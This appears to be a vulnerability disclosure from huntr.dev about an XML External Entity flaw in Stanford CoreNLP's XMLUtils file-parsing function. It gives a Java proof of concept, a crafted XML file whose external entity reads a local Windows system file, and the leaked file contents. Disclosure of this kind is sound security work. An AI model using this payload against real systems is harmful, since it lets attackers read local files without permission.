in stanfordnlp/corenlp

2021-09-2919:34:14

srikanthprathi

www.huntr.dev

0.002 Low

EPSS

Percentile

55.8%

JSON

✍️ Description

The Stanford CoreNLP package provides a set of natural language analysis tools written in Java, is using a vulnerable XML External Entity (XXE). An attacker that is able to provide a crafted XML file as input to the getTextContentFromTagsFromFile() function in the “XMLUtils.java” file may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.

🕵️‍♂️ Proof of Concept

package xxe_poc;
import java.io.File;
import java.util.List;
import edu.stanford.nlp.util.XMLUtils; 

public class Poc {

	public static void main(String[] args) {
		File file = new File("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample.xml");
		List&lt;String&gt; returnLlist = XMLUtils.getTextContentFromTagsFromFile(file, "lastName");
		System.out.print(returnLlist);

	}
}

sample.xml


&lt;!DOCTYPE replace [&lt;!ENTITY ent SYSTEM "file:///c:/windows/win.ini"&gt; ]&gt;
&lt;userInfo&gt;
 &lt;firstName&gt;John&lt;/firstName&gt;
 &lt;lastName&gt;&ent;&lt;/lastName&gt;
&lt;/userInfo&gt;

Check the Output:

[; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
]

0.002 Low

EPSS

Percentile

55.8%

JSON

Related for 2F8BAF6C-14B3-420D-8EDE-9805797CD324